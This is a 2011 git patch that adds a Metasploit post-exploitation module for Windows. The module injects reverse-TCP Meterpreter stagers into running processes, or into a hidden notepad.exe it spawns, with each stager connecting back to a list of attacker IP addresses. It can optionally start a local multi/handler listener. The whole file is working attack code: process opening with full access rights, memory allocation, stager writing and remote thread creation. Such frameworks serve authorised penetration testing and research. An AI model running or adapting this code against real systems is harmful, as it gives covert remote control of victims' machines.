From 43ba211d3d51b8d48f2bd2473c28a5c1389bc9ab Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Sat, 26 Mar 2011 03:35:59 +0000 Subject: [PATCH] Module for injection in to a list of processes a given payload connecting to a list of given IP addresses. git-svn-id: file:///home/svn/framework3/trunk@12145 4d416f70-5f16-0410-b530-b9f4589650da --- .../manage/multi_meterpreter_inject.rb | 137 ++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 modules/post/windows/manage/multi_meterpreter_inject.rb diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb new file mode 100644 index 0000000000..21a36dc8a1 --- /dev/null +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -0,0 +1,137 @@ +## +# $Id$ +## + +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Inject in memory multiple payloads', + 'Description' => %q{ This module will inject in to several process a given + payload and connecting to a given list of IP Addresses. + The module works with a given lists of IP Addresses and + process PIDs if no PID is given it will start a the given + process in the advanced options and inject the selected + payload in to the memory of the created module.}, + 'License' => MSF_LICENSE, + 'Author' => [ 'Carlos Perez '], + 'Version' => '$Revision$', + 'Platform' => [ 'windows' ], + 'SessionTypes' => [ 'meterpreter'] + )) + register_options( + [ + OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', "windows/meterpreter/reverse_tcp"]), + OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]), + OptString.new('IPLIST', [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]), + OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']), + OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false]) + + ], self.class) + register_advanced_options( + [ + OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe']) + ],self.class) + end + + # Run Method for when run command is issued + def run + # Set variables + multi_ip = nil + multi_pid = nil + + print_status("Running module against #{sysinfo['Computer']}") + + if datastore['HANDLER'] + create_multi_handler(datastore['PAYLOAD'],datastore['LPORT']) + end + + multi_ip = datastore['IPLIST'].split(";") + multi_pid = datastore['PIDLIST'].split(";") + + multi_ip.zip(multi_pid).each do |a| + # Check if we have an IP for the session + if a[1] + payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT']) + inject(a[1],payload) + select(nil, nil, nil, 5) + else + # if no PID we create a process to host the Meterpreter session + payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT']) + pid_num = start_proc(datastore['PROCESSNAME']) + inject(pid_num,payload) + select(nil, nil, nil, 5) + end + end + end + + # Function for injecting payload in to a given PID + #------------------------------------------------------------------------------- + def inject(target_pid, payload_to_inject) + print_status("Injecting meterpreter into process ID #{target_pid}") + begin + host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS) + raw = payload_to_inject.generate + mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) + + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, raw) + host_process.thread.create(mem, 0) + print_good("Successfully injected Meterpreter in to process: #{target_pid}") + rescue::Exception => e + print_error("Failed to Inject Payload to #{target_pid}!") + print_error(e) + end + end + + # Function for Creation of Connection Handler + #------------------------------------------------------------------------------- + def create_multi_handler(payload_to_inject,rport,rhost = '0.0.0.0') + print_status("Starting connection handler at port #{rport} for #{payload_to_inject}") + mul = client.framework.exploits.create("multi/handler") + mul.datastore['WORKSPACE'] = session.workspace + mul.datastore['PAYLOAD'] = payload_to_inject + mul.datastore['LHOST'] = rhost + mul.datastore['LPORT'] = rport + mul.datastore['EXITFUNC'] = 'process' + mul.datastore['ExitOnSession'] = false + + mul.exploit_simple( + 'Payload' => mul.datastore['PAYLOAD'], + 'RunAsJob' => true + ) + print_good("Multi/Handler starterd!") + end + + # Function for Creating the Payload + #------------------------------------------------------------------------------- + def create_payload(payload_type,lhost,lport) + print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}") + payload = payload_type + pay = client.framework.payloads.create(payload) + pay.datastore['LHOST'] = lhost + pay.datastore['LPORT'] = lport + return pay + end + + # Function starting notepad.exe process + #------------------------------------------------------------------------------- + def start_proc(proc_name) + print_good("Starting Notepad.exe to house Meterpreter Session.") + proc = client.sys.process.execute(proc_name, nil, {'Hidden' => true }) + print_good("Process created with pid #{proc.pid}") + return proc.pid + end +end \ No newline at end of file